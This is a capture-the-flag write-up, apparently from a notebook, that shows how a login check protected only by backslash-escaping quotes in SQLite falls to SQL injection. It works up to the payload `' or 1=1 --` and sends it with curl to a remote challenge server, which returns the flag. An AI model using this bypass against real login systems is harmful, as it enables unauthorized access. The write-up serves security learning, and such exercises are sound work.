# Challenge 

Overcome this sanitization:

```python
def sanitize(string):
    return string.replace("'", "\\'").replace('"', '\\"')
```

to force a sql injection here:

```python
        res = run(f"SELECT username, password FROM Users WHERE username='{username}' AND password='{password}';")
```

In [2]:
!curl -X POST "localhost:8999/login" -F "username=test" -F "password=test"

<html>who r u</html>

# Lets try with sql map :)

- it is SQLLite3

In [8]:
!curl -vv -X POST "localhost:8999/login" -F "username=test" -F "password=test" 2>&1 

Note: Unnecessary use of -X or --request, POST is already inferred.
02:25:53.310951 [0-0] * Host localhost:8999 was resolved.
02:25:53.311004 [0-0] * IPv6: ::1
02:25:53.311011 [0-0] * IPv4: 127.0.0.1
02:25:53.311019 [0-0] * [SETUP] added
02:25:53.311064 [0-0] *   Trying [::1]:8999...
02:25:53.311223 [0-0] * Connected to localhost (::1) port 8999
02:25:53.311239 [0-0] * using HTTP/1.x
02:25:53.311359 [0-0] > POST /login HTTP/1.1
02:25:53.311359 [0-0] > Host: localhost:8999
02:25:53.311359 [0-0] > User-Agent: curl/8.12.1
02:25:53.311359 [0-0] > Accept: */*
02:25:53.311359 [0-0] > Content-Length: 266
02:25:53.311359 [0-0] > Content-Type: multipart/form-data; boundary=------------------------S0Sx9uekcIk1sRhr7s3GY1
02:25:53.311359 [0-0] > 
02:25:53.311445 [0-0] * upload completely sent off: 266 bytes
02:25:53.316638 [0-0] < HTTP/1.1 200 OK
02:25:53.316813 [0-0] < Server: Werkzeug/3.1.3 Python/3.13.3
02:25:53.316901 [0-0] < Date: Tue, 13 May 2025 00:25:53 GMT
02:25:53.316935 [0-0] < Content-

=> Nope, does not work that well, atleast with this setup so let's get manual again

# Manual SQLi

From the [documentation](https://www.sqlite.org/lang_expr.html)

```
C-style escapes using the backslash character are not supported because they are not standard SQL. 
```

Therefore, `password='` results into

```python
        res = run(f"SELECT username, password FROM Users WHERE username='{username}' AND password='\'';")
```
This literally checks if `password="\"`. So we can push characters afterwards.


The return statement checks that the username must be `roo`. In that case, we do not need any injection at all, so let's just focus on the end:

Therefore, `password=' or 1=1 --` results into

```python
        res = run(f"SELECT username, password FROM Users WHERE username='roo' AND password='\' or 1=1 --';")
```

which is all we need.

In [9]:
!curl -X POST "http://155.248.210.243:42380/login" -F "username=roo" -F "password=' or 1=1 --"

<html>ictf{baby's_first_time_writing_web!_NDy3MOvyplcw}</html>

# Other TIL

- Use flask in `debug`-mode and use a mount for a hot edit:


```
docker run -d -p 8999:8000 -v "$PWD:/srv" may-san
```